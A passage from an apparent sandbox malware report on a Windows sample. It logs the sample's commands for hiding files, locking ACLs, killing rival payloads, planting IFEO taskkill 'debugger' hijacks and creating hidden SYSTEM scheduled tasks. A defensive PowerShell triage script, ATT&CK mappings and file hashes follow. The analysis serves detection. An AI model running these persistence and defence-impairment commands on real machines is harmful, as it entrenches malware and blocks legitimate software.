C:\Windows\SysWOW64\attrib.exeattrib +s +h +r C:\Windows\svchost.exe3⤵
- Sets file to hidden
- Drops file in Windows directory
- Views/modifies file attributes
-
C:\Windows\SysWOW64\cmd.exeC:\Windows\system32\cmd.exe /S /D /c" echo y"3⤵
-
C:\Windows\SysWOW64\cacls.execacls C:\Windows\svchost.exe /d everyone3⤵
-
C:\Windows\SysWOW64\taskkill.exetaskkill /f /t /im tasksche.exe3⤵
- Kills process with taskkill
-
C:\Windows\SysWOW64\attrib.exeattrib +s +h +r C:\Windows\tasksche.exe3⤵
- Sets file to hidden
- Views/modifies file attributes
-
C:\Windows\SysWOW64\cmd.exeC:\Windows\system32\cmd.exe /S /D /c" echo y"3⤵
-
C:\Windows\SysWOW64\cacls.execacls C:\Windows\tasksche.exe /d everyone3⤵
-
C:\Windows\SysWOW64\taskkill.exetaskkill /f /t /im srvany.exe3⤵
- Kills process with taskkill
-
C:\Windows\SysWOW64\attrib.exeattrib +s +h +r C:\Windows\srvany.exe3⤵
- Sets file to hidden
- Drops file in Windows directory
- Views/modifies file attributes
-
C:\Windows\SysWOW64\cmd.exeC:\Windows\system32\cmd.exe /S /D /c" echo y"3⤵
-
C:\Windows\SysWOW64\cacls.execacls C:\Windows\srvany.exe /d everyone3⤵
-
C:\Windows\SysWOW64\taskkill.exetaskkill /f /t /im WUDHostServices.exe3⤵
- Kills process with taskkill
-
C:\Windows\SysWOW64\attrib.exeattrib +s +h +r C:\Windows\System32\WUDHostServices.exe3⤵
- Sets file to hidden
- Drops file in System32 directory
- Views/modifies file attributes
-
C:\Windows\SysWOW64\cmd.exeC:\Windows\system32\cmd.exe /S /D /c" echo y"3⤵
-
C:\Windows\SysWOW64\cacls.execacls C:\Windows\System32\WUDHostServices.exe /d everyone3⤵
-
C:\Windows\SysWOW64\taskkill.exetaskkill /f /im wbmoney.exe3⤵
- Kills process with taskkill
-
C:\Windows\SysWOW64\taskkill.exetaskkill /f /im GGtbviewer.exe3⤵
- Kills process with taskkill
-
C:\Windows\SysWOW64\taskkill.exetaskkill /f /t /im Netohad.pif3⤵
- Kills process with taskkill
-
C:\Windows\SysWOW64\taskkill.exetaskkill /f /t /im Qrhkveb.com3⤵
- Kills process with taskkill
-
C:\Windows\SysWOW64\taskkill.exetaskkill /f /t /im Tnntknl.com3⤵
- Kills process with taskkill
-
C:\Windows\SysWOW64\taskkill.exetaskkill /f /t /im Snwhtdw.bat3⤵
- Kills process with taskkill
-
C:\Windows\SysWOW64\taskkill.exetaskkill /f /t /im dllhsot.exe3⤵
- Kills process with taskkill
-
C:\Windows\SysWOW64\taskkill.exetaskkill /f /t /im Tasksvr.exe3⤵
- Kills process with taskkill
-
C:\Windows\SysWOW64\taskkill.exetaskkill /f /t /im serices.exe3⤵
- Kills process with taskkill
-
C:\Windows\SysWOW64\taskkill.exetaskkill /f /t /im seever.exe3⤵
- Kills process with taskkill
-
C:\Windows\SysWOW64\taskkill.exetaskkill /f /t /im mssecsvc.exe3⤵
- Kills process with taskkill
-
C:\Windows\SysWOW64\taskkill.exetaskkill /f /t /im svchsot.exe3⤵
- Kills process with taskkill
-
C:\Windows\SysWOW64\taskkill.exetaskkill /f /t /im lsacs.exe3⤵
- Kills process with taskkill
-
C:\Windows\SysWOW64\taskkill.exetaskkill /f /t /im nsa.exe3⤵
- Kills process with taskkill
-
C:\Windows\SysWOW64\taskkill.exetaskkill /f /t /im csrs.exe3⤵
- Kills process with taskkill
-
C:\Windows\SysWOW64\taskkill.exetaskkill /f /im WerFault.exe3⤵
- Kills process with taskkill
-
C:\Windows\SysWOW64\taskkill.exetaskkill /f /im WScript.exe3⤵
- Kills process with taskkill
-
C:\Windows\SysWOW64\taskkill.exetaskkill /f /t /im NV-NO.exe3⤵
- Kills process with taskkill
-
C:\Windows\SysWOW64\taskkill.exetaskkill /f /t /im NV.exe3⤵
- Kills process with taskkill
-
C:\Windows\SysWOW64\taskkill.exetaskkill /f /t /im Eternalblue-2.2.0.exe3⤵
- Kills process with taskkill
-
C:\Windows\SysWOW64\taskkill.exetaskkill /f /t /im Eternalchampion-2.0.0.exe3⤵
- Kills process with taskkill
-
C:\Windows\SysWOW64\taskkill.exetaskkill /f /t /im Doublepulsar-1.3.1.exe3⤵
- Kills process with taskkill
-
C:\Windows\SysWOW64\Wbem\WMIC.exewmic process where "name='explorer.exe' and ExecutablePath='C:\\Windows\\system\\explorer.exe'" call Terminate3⤵
- Kills process with WMI
-
C:\Windows\SysWOW64\Wbem\WMIC.exewmic process where "name='explorer.exe' and ExecutablePath='C:\\Windows\\Fonts\\explorer.exe'" call Terminate3⤵
- Kills process with WMI
-
C:\Windows\SysWOW64\Wbem\WMIC.exewmic process where "name='conhost.exe' and ExecutablePath='C:\\Windows\\Fonts\\conhost.exe'" call Terminate3⤵
- Kills process with WMI
-
C:\Windows\SysWOW64\reg.exereg delete "HKEY_LOCAL_MACHINE\SOFTWARE\Microsoft\Windows NT\CurrentVersion\Image File Execution Options\smss.exe" /f3⤵
-
C:\Windows\SysWOW64\reg.exereg delete "HKEY_LOCAL_MACHINE\SOFTWARE\Microsoft\Windows NT\CurrentVersion\Image File Execution Options\svchost.exe" /f3⤵
- Sets file execution options in registry
-
C:\Windows\SysWOW64\reg.exereg delete "HKEY_LOCAL_MACHINE\SOFTWARE\Microsoft\Windows NT\CurrentVersion\Image File Execution Options\rundllhost.exe" /f3⤵
-
C:\Windows\SysWOW64\reg.exereg delete "HKEY_LOCAL_MACHINE\SOFTWARE\Microsoft\Windows NT\CurrentVersion\Image File Execution Options\sc.exe" /f3⤵
-
C:\Windows\SysWOW64\reg.exereg delete "HKEY_LOCAL_MACHINE\SOFTWARE\Microsoft\Windows NT\CurrentVersion\Image File Execution Options\schtasks.exe" /f3⤵
-
C:\Windows\SysWOW64\reg.exereg add "HKEY_LOCAL_MACHINE\SOFTWARE\Microsoft\Windows NT\CurrentVersion\Image File Execution Options\wax.exe" /v "debugger" /d taskkill.exe /f3⤵
- Sets file execution options in registry
-
C:\Windows\SysWOW64\reg.exereg add "HKEY_LOCAL_MACHINE\SOFTWARE\Microsoft\Windows NT\CurrentVersion\Image File Execution Options\Systmss.exe" /v "debugger" /d taskkill.exe /f3⤵
- Sets file execution options in registry
-
C:\Windows\SysWOW64\reg.exereg add "HKEY_LOCAL_MACHINE\SOFTWARE\Microsoft\Windows NT\CurrentVersion\Image File Execution Options\ystmss.exe" /v "debugger" /d taskkill.exe /f3⤵
- Sets file execution options in registry
-
C:\Windows\SysWOW64\reg.exereg add "HKEY_LOCAL_MACHINE\SOFTWARE\Microsoft\Windows NT\CurrentVersion\Image File Execution Options\wuauc1t.exe" /v "debugger" /d taskkill.exe /f3⤵
- Sets file execution options in registry
-
C:\Windows\SysWOW64\reg.exereg add "HKEY_LOCAL_MACHINE\SOFTWARE\Microsoft\Windows NT\CurrentVersion\Image File Execution Options\2.exe" /v "debugger" /d taskkill.exe /f3⤵
- Sets file execution options in registry
-
C:\Windows\SysWOW64\reg.exereg add "HKEY_LOCAL_MACHINE\SOFTWARE\Microsoft\Windows NT\CurrentVersion\Image File Execution Options\1.exe" /v "debugger" /d taskkill.exe /f3⤵
- Sets file execution options in registry
-
C:\Windows\SysWOW64\reg.exereg add "HKEY_LOCAL_MACHINE\SOFTWARE\Microsoft\Windows NT\CurrentVersion\Image File Execution Options\3.exe" /v "debugger" /d taskkill.exe /f3⤵
- Sets file execution options in registry
-
C:\Windows\SysWOW64\reg.exereg add "HKEY_LOCAL_MACHINE\SOFTWARE\Microsoft\Windows NT\CurrentVersion\Image File Execution Options\nanol.exe" /v "debugger" /d taskkill.exe /f3⤵
- Sets file execution options in registry
-
C:\Windows\SysWOW64\reg.exereg add "HKEY_LOCAL_MACHINE\SOFTWARE\Microsoft\Windows NT\CurrentVersion\Image File Execution Options\svchostr.exe" /v "debugger" /d taskkill.exe /f3⤵
- Sets file execution options in registry
-
C:\Windows\SysWOW64\reg.exereg add "HKEY_LOCAL_MACHINE\SOFTWARE\Microsoft\Windows NT\CurrentVersion\Image File Execution Options\csrss..exe" /v "debugger" /d taskkill.exe /f3⤵
- Sets file execution options in registry
-
C:\Windows\SysWOW64\taskkill.exetaskkill /f /t /im lservice.exe3⤵
- Kills process with taskkill
-
C:\Windows\SysWOW64\taskkill.exetaskkill /f /t /im ystmss.exe3⤵
- Kills process with taskkill
-
C:\Windows\SysWOW64\taskkill.exetaskkill /f /t /im wuauc1t.exe3⤵
- Kills process with taskkill
-
C:\Windows\SysWOW64\cmd.execmd /c c:\windows\demo.bat2⤵
- Suspicious use of WriteProcessMemory
-
C:\Windows\SysWOW64\sc.exesc config Schedule start= auto3⤵
- Launches sc.exe
-
C:\Windows\SysWOW64\sc.exesc start Schedule3⤵
- Launches sc.exe
-
C:\Windows\SysWOW64\schtasks.exeschtasks /delete /tn RavTask /f3⤵
-
C:\Windows\SysWOW64\schtasks.exeschtasks /delete /tn GooglePinginConfigs /f3⤵
-
C:\Windows\SysWOW64\schtasks.exeschtasks /create /sc minute /mo 240 /tn "RavTask" /tr "C:\windows\IIS\free.bat" /ru "system" /f3⤵
- Creates scheduled task(s)
-
C:\Windows\SysWOW64\schtasks.exeschtasks /create /tn "GooglePinginConfigs" /tr "C:\windows\IIS\CPUInfo.exe" /sc onstart /ru "system" /f3⤵
- Creates scheduled task(s)
-
C:\Windows\SysWOW64\attrib.exeC:\Windows\System32\attrib +s +h C:\WINDOWS\Tasks\RavTask.job3⤵
- Sets file to hidden
- Views/modifies file attributes
-
C:\Windows\SysWOW64\attrib.exeC:\Windows\System32\attrib +s +h C:\WINDOWS\Tasks\GooglePinginConfigs.job3⤵
- Sets file to hidden
- Views/modifies file attributes
-
C:\Windows\SysWOW64\schtasks.exeschtasks /run /tn "RavTask"3⤵
-
C:\Windows\SysWOW64\WScript.exe"C:\Windows\System32\WScript.exe" "C:\Users\Admin\AppData\Local\Temp\tem.vbs"2⤵
-
C:\Windows\SYSTEM32\cmd.exeC:\Windows\SYSTEM32\cmd.exe /c "C:\windows\IIS\free.bat"1⤵
-
C:\Windows\system32\PING.EXEping -n 2 127.0.0.12⤵
- Runs ping.exe
-
C:\Windows\system32\taskkill.exetaskkill /f /t /im NV-NO.exe2⤵
- Kills process with taskkill
-
C:\Windows\system32\taskkill.exetaskkill /f /t /im NV.exe2⤵
- Kills process with taskkill
-
C:\Windows\system32\taskkill.exetaskkill /f /t /im Eternalblue-2.2.0.exe2⤵
- Kills process with taskkill
-
C:\Windows\system32\taskkill.exetaskkill /f /t /im Eternalchampion-2.0.0.exe2⤵
- Kills process with taskkill
-
C:\Windows\system32\taskkill.exetaskkill /f /t /im Doublepulsar-1.3.1.exe2⤵
- Kills process with taskkill
-
C:\Windows\system32\taskkill.exetaskkill /f /im mysqld.exe2⤵
- Kills process with taskkill
-
C:\Windows\system32\taskkill.exetaskkill /f /im CPUInfo.exe2⤵
- Kills process with taskkill
-
C:\Windows\system32\taskkill.exetaskkill /f /im jvav.exe2⤵
- Kills process with taskkill
-
C:\Windows\system32\PING.EXEping -n 5 127.0.0.12⤵
- Runs ping.exe
-
C:\Windows\system32\schtasks.exeschtasks /run /tn "GooglePinginConfigs"2⤵
-
C:\windows\IIS\CPUInfo.exeC:\windows\IIS\CPUInfo.exe1⤵
- Identifies VirtualBox via ACPI registry values (likely anti-VM)
- Executes dropped EXE
- Drops file in System32 directory
- Suspicious use of NtSetInformationThreadHideFromDebugger
- Drops file in Windows directory
- Modifies data under HKEY_USERS
- Suspicious behavior: EnumeratesProcesses
- Suspicious use of SetWindowsHookEx
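The process tree above is one routine in three parts. First, a clean-up of competing payloads: sc stop/delete on their service names, taskkill and WMI "call Terminate" on their image names and paths, reg delete of IFEO keys they use, and then reg add of IFEO "debugger = taskkill.exe" entries for their binaries (Windows starts the named debugger with the target's command line instead of the target, so the target never runs). Second, hardening of the sample's own files with attrib +s +h +r and "cacls <path> /d everyone", which leaves an explicit Deny ACE for Everyone. Third, persistence via demo.bat: the Schedule service is forced on, RavTask runs free.bat every 240 minutes, GooglePinginConfigs runs CPUInfo.exe at start, both .job files are hidden, and free.bat itself kills CPUInfo.exe and re-runs the GooglePinginConfigs task, so the payload is restarted on a timer. The following PowerShell is an added host-triage script written for this page; it is not code from the sandbox, the sample or any vendor. It assumes an elevated PowerShell 5.1 or later session on Windows 8 / Server 2012 or later (for Get-ScheduledTask), takes the task names, paths and SHA256 values from this report, reads C:\Progra~1 as the 8.3 short name of C:\Program Files, and the -Remediate switch is this example's own.

```powershell
<#
Added triage script for the behaviour in the process tree above. Example written for
this page, not code from the sandbox, the sample or any vendor. Read-only unless
-Remediate (this example's own switch) is given. Run elevated, PowerShell 5.1+.
Assumptions: task names, paths and SHA256 values are copied from this report;
"C:\Progra~1" is taken as the 8.3 short name of "C:\Program Files".
#>
[CmdletBinding()]
param([switch]$Remediate)

# IFEO lives under the native key; the WOW64 view is checked too in case a 32-bit
# writer was redirected (the report shows reg.exe run from SysWOW64).
$ifeoKeys = @(
    'HKLM:\SOFTWARE\Microsoft\Windows NT\CurrentVersion\Image File Execution Options',
    'HKLM:\SOFTWARE\Wow6432Node\Microsoft\Windows NT\CurrentVersion\Image File Execution Options'
)

function Get-IfeoTaskkillHijack {
    # A "debugger" value makes the loader start that program with the target's
    # command line appended, instead of the target. With taskkill.exe as the
    # debugger the target never runs; the sample plants this for competing payload names.
    foreach ($key in $ifeoKeys) {
        Get-ChildItem -Path $key -ErrorAction SilentlyContinue | ForEach-Object {
            $dbg = (Get-ItemProperty -Path $_.PSPath -Name debugger -ErrorAction SilentlyContinue).debugger
            if ($dbg -and $dbg -match 'taskkill') {
                [pscustomobject]@{ Image = $_.PSChildName; Debugger = $dbg; Key = $_.PSPath }
            }
        }
    }
}

function Get-Sha256Hex([string]$Path) {
    # .NET file access is not affected by the +s +h +r attributes attrib.exe set.
    $sha = [System.Security.Cryptography.SHA256]::Create()
    $fs  = [System.IO.File]::OpenRead($Path)
    try     { ([System.BitConverter]::ToString($sha.ComputeHash($fs)) -replace '-', '').ToLower() }
    finally { $fs.Dispose(); $sha.Dispose() }
}

# 1. IFEO hijacks (the "reg add ... /v debugger /d taskkill.exe" lines)
$hijacks = @(Get-IfeoTaskkillHijack)
$hijacks | Format-Table Image, Debugger, Key -AutoSize
if ($Remediate) {
    foreach ($h in $hijacks) { Remove-ItemProperty -Path $h.Key -Name debugger -Force }
}

# 2. Persistence: the tasks demo.bat creates (RavTask every 240 min, GooglePinginConfigs
#    at start), the one it deletes, and hidden .job files (the sample marks them +s +h).
foreach ($name in 'RavTask', 'GooglePinginConfigs', 'Adobe Flash Player Updaters') {
    $task = Get-ScheduledTask -TaskName $name -ErrorAction SilentlyContinue
    if ($task) {
        '{0,-28} {1} {2}' -f $name, $task.Actions[0].Execute, $task.Actions[0].Arguments
    }
}
Get-ChildItem -Path 'C:\Windows\Tasks\*.job' -Force -ErrorAction SilentlyContinue |
    Where-Object { $_.Attributes -band [System.IO.FileAttributes]::Hidden } |
    Select-Object FullName, Attributes

# 3. Dropped files, compared with the SHA256 values in the report's Downloads section
$known = @{
    'C:\Windows\IIS\CPUInfo.exe' = '3889f6902bcbcb7cc477c599b3fec4864ffe0ce6c34a6079473232d5bf5c1de0'
    'C:\Windows\IIS\free.bat'    = '2401f4b6f34644668ee50911fb7e9d51c82b65776eea940f0e8e16ff9ec9d68e'
    'C:\Windows\demo.bat'        = '59f0d74e831cbd6b08b14e7c4efbe383b0ea8b7463fda81c35acee799c983e6e'
    'C:\Windows\demc.bat'        = '3457579ecd591d2905e833be4aa7215e0302623447c1072bb55586c4a0284203'
}
foreach ($path in $known.Keys) {
    if ([System.IO.File]::Exists($path)) {
        $hash = Get-Sha256Hex $path
        $verdict = if ($hash -eq $known[$path]) { 'matches the report' } else { "differs: $hash" }
        '{0}: {1}' -f $path, $verdict
    }
}

# 4. "cacls <path> /d everyone" leaves an explicit Deny ACE for Everyone. That ACE
#    also covers READ_CONTROL, so Get-Acl can fail for a non-owner; report that as
#    a finding rather than an error.
$touched = 'C:\ProgramData\dll', 'C:\Program Files\dll', 'C:\wax.exe', 'C:\Windows\svchost.exe',
           'C:\Windows\tasksche.exe', 'C:\Windows\srvany.exe', 'C:\Windows\System32\WUDHostServices.exe'
foreach ($path in $touched) {
    if (-not ([System.IO.File]::Exists($path) -or [System.IO.Directory]::Exists($path))) { continue }
    try {
        $deny = @((Get-Acl -LiteralPath $path -ErrorAction Stop).Access | Where-Object {
            $_.AccessControlType -eq 'Deny' -and $_.IdentityReference.Value -like '*Everyone'
        })
        if ($deny.Count) { '{0}: Deny ACE for Everyone ({1})' -f $path, $deny[0].FileSystemRights }
    } catch {
        '{0}: DACL unreadable (consistent with cacls /d everyone); take ownership to inspect' -f $path
    }
}

# 5. The sample's cmd.exe opened the hosts file for modification: list active entries.
Get-Content -Path "$env:SystemRoot\System32\drivers\etc\hosts" |
    Where-Object { $_ -and $_ -notmatch '^\s*#' }
```

Run it without arguments first and review the output before using -Remediate, which only removes the IFEO debugger values. The IFEO check is the one worth keeping in a baseline: a legitimate Debugger value names a debugger executable, and taskkill.exe has no legitimate use there. The files the sample hides are also readable by ordinary tools only with -Force (or .NET calls, as above), which is why a plain Get-ChildItem of C:\Windows\Tasks will not show the two .job files.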
Network
MITRE ATT&CK Matrix (ATT&CK v6)
Persistence
- Registry Run Keys / Startup Folder (1)
- Hidden Files and Directories (2)
- Modify Existing Service (1)
- Scheduled Task (1)
Defense Evasion
- Virtualization/Sandbox Evasion (1)
- Modify Registry (1)
- Hidden Files and Directories (2)
- Impair Defenses (1)
- File Permissions Modification (1)
Downloads
C:\Users\Admin\AppData\Local\Temp\tem.vbs
  Filesize: 275B
  MD5: ef1c7052536cd8a4ed2912e520c2a730
  SHA1: 372c30cd30ec0ba499ed497453295bb84e89b86b
  SHA256: 060183c7d23452e3f89d914049218eae7e84ce725e10d315638dc644a23873fc
  SHA512: 7bdc914f8e002fc6141cdab3b4619a54735555ccb8fd508a57d341bfe2967f159b464b35954a120fdd38b6e9422663511964367fbfea07994f2653d9b9f85fae

C:\Windows\IIS\CPUInfo.exe
  Filesize: 5.3MB
  MD5: 1065f9b7c189f4a22d7f11626f16b976
  SHA1: 562ea85b1d91f08448b2885d8346231f311d656f
  SHA256: 3889f6902bcbcb7cc477c599b3fec4864ffe0ce6c34a6079473232d5bf5c1de0
  SHA512: bd112a5741087ba50dcfb201b39a23202030107bd069067f20e38a5706492fb134a00b117952e29479b42da2a04a498ce5df06187c34e065cea94538bed60c41

C:\windows\IIS\CPUInfo.exe (listed a second time by the sandbox with the path in different case; same hashes)
  Filesize: 5.3MB
  MD5: 1065f9b7c189f4a22d7f11626f16b976
  SHA1: 562ea85b1d91f08448b2885d8346231f311d656f
  SHA256: 3889f6902bcbcb7cc477c599b3fec4864ffe0ce6c34a6079473232d5bf5c1de0
  SHA512: bd112a5741087ba50dcfb201b39a23202030107bd069067f20e38a5706492fb134a00b117952e29479b42da2a04a498ce5df06187c34e065cea94538bed60c41

C:\windows\IIS\free.bat
  Filesize: 379B
  MD5: 857fc3145d5aee4399bf6c9fd9dc8245
  SHA1: 18c27ecbebc5a3095e95690f2399c7b5e92e40fd
  SHA256: 2401f4b6f34644668ee50911fb7e9d51c82b65776eea940f0e8e16ff9ec9d68e
  SHA512: 289da4490f7623cca94adb6f19006dfa5628a1080ac963199e05fdca65a1f2d7db888f5aa63ee264c5c6c781cb802e8a8d07cec14c8ab4cf7be2ad07516caf35

\??\c:\windows\demc.bat
  Filesize: 7KB
  MD5: a17bd95441d3fa37660e87842dc896aa
  SHA1: 83951f95e5739593ac0a2d71b56075509298e542
  SHA256: 3457579ecd591d2905e833be4aa7215e0302623447c1072bb55586c4a0284203
  SHA512: bd7cb5dbc9f11ace523bc89486b8d097f6c092a9f09b1dc847d7b4854db7f42a292aef20bd4d3d89a743f67607ebb0156327644def83fd5ea30c239297e53b1f

\??\c:\windows\demo.bat
  Filesize: 511B
  MD5: 11275993a1a8f44371ab48820422b273
  SHA1: 01a96b635ffea21d3d7ac6c4694ce1da25bcbb33
  SHA256: 59f0d74e831cbd6b08b14e7c4efbe383b0ea8b7463fda81c35acee799c983e6e
  SHA512: db1df17de51e48d18cfc145983b1d9851e94f9fc908e99d5534516b81677e1e8c353d438422b45fd9702b85e0d9103297a86313b6bdc654703f01f23f4aab74c

Memory dumps
memory/240-157-0x0000000000000000-mapping.dmp
-
memory/420-198-0x0000000000000000-mapping.dmp
-
memory/648-175-0x0000000000000000-mapping.dmp
-
memory/872-177-0x0000000000000000-mapping.dmp
-
memory/916-190-0x0000000000000000-mapping.dmp
-
memory/1056-174-0x0000000000000000-mapping.dmp
-
memory/1060-148-0x0000000000000000-mapping.dmp
-
memory/1132-149-0x0000000000000000-mapping.dmp
-
memory/1316-167-0x0000000000000000-mapping.dmp
-
memory/1332-185-0x0000000000000000-mapping.dmp
-
memory/1408-173-0x0000000000000000-mapping.dmp
-
memory/1448-159-0x0000000000000000-mapping.dmp
-
memory/1468-151-0x0000000000000000-mapping.dmp
-
memory/1532-199-0x0000000000000000-mapping.dmp
-
memory/1536-169-0x0000000000000000-mapping.dmp
-
memory/1660-171-0x0000000000000000-mapping.dmp
-
memory/1860-170-0x0000000000000000-mapping.dmp
-
memory/1936-184-0x0000000000000000-mapping.dmp
-
memory/1956-194-0x0000000000000000-mapping.dmp
-
memory/2084-146-0x0000000000000000-mapping.dmp
-
memory/2308-176-0x0000000000000000-mapping.dmp
-
memory/2312-197-0x0000000000000000-mapping.dmp
-
memory/2412-150-0x0000000000000000-mapping.dmp
-
memory/2668-188-0x0000000000000000-mapping.dmp
-
memory/2756-136-0x0000000000000000-mapping.dmp
-
memory/2764-182-0x0000000000000000-mapping.dmp
-
memory/2800-165-0x0000000000000000-mapping.dmp
-
memory/2844-161-0x0000000000000000-mapping.dmp
-
memory/2964-153-0x0000000000400000-0x0000000000A2E000-memory.dmp
  Filesize: 6.2MB
-
memory/2964-132-0x0000000000400000-0x0000000000A2E000-memory.dmp
  Filesize: 6.2MB
-
memory/3104-186-0x0000000000000000-mapping.dmp
-
memory/3112-158-0x0000000000000000-mapping.dmp
-
memory/3120-139-0x0000000000000000-mapping.dmp
-
memory/3124-192-0x0000000000000000-mapping.dmp
-
memory/3128-180-0x0000000000000000-mapping.dmp
-
memory/3140-152-0x0000000000000000-mapping.dmp
-
memory/3236-163-0x0000000000000000-mapping.dmp
-
memory/3316-131-0x0000000000000000-mapping.dmp
-
memory/3328-145-0x0000000000000000-mapping.dmp
-
memory/3352-179-0x0000000000000000-mapping.dmp
-
memory/3360-178-0x0000000000000000-mapping.dmp
-
memory/3428-130-0x0000000000000000-mapping.dmp
-
memory/3696-162-0x0000000000000000-mapping.dmp
-
memory/3784-164-0x0000000000000000-mapping.dmp
-
memory/3928-135-0x0000000000000000-mapping.dmp
-
memory/3952-160-0x0000000000000000-mapping.dmp
-
memory/3992-142-0x0000000000000000-mapping.dmp
-
memory/4016-172-0x0000000000000000-mapping.dmp
-
memory/4020-187-0x0000000000000000-mapping.dmp
-
memory/4204-155-0x0000000000000000-mapping.dmp
-
memory/4272-191-0x0000000000000000-mapping.dmp
-
memory/4304-195-0x0000000000000000-mapping.dmp
-
memory/4356-143-0x0000000000000000-mapping.dmp
-
memory/4376-138-0x0000000000000000-mapping.dmp
-
memory/4392-166-0x0000000000000000-mapping.dmp
-
memory/4444-189-0x0000000000000000-mapping.dmp
-
memory/4476-181-0x0000000000000000-mapping.dmp
-
memory/4480-144-0x0000000000000000-mapping.dmp
-
memory/4592-206-0x00000000771E0000-0x0000000077383000-memory.dmp
  Filesize: 1.6MB
-
memory/4592-205-0x0000000000400000-0x0000000000F53000-memory.dmp
  Filesize: 11.3MB
-
memory/4592-204-0x0000000000400000-0x0000000000F53000-memory.dmp
  Filesize: 11.3MB
-
memory/4592-207-0x0000000000400000-0x0000000000F53000-memory.dmp
  Filesize: 11.3MB
-
memory/4592-202-0x0000000000400000-0x0000000000F53000-memory.dmp
  Filesize: 11.3MB
-
memory/4592-203-0x00000000771E0000-0x0000000077383000-memory.dmp
  Filesize: 1.6MB
-
memory/4608-196-0x0000000000000000-mapping.dmp
-
memory/4748-141-0x0000000000000000-mapping.dmp
-
memory/4864-140-0x0000000000000000-mapping.dmp
-
memory/4876-183-0x0000000000000000-mapping.dmp
-
memory/4920-147-0x0000000000000000-mapping.dmp
-
memory/4932-193-0x0000000000000000-mapping.dmp
-
memory/5068-137-0x0000000000000000-mapping.dmp
-
memory/5072-168-0x0000000000000000-mapping.dmp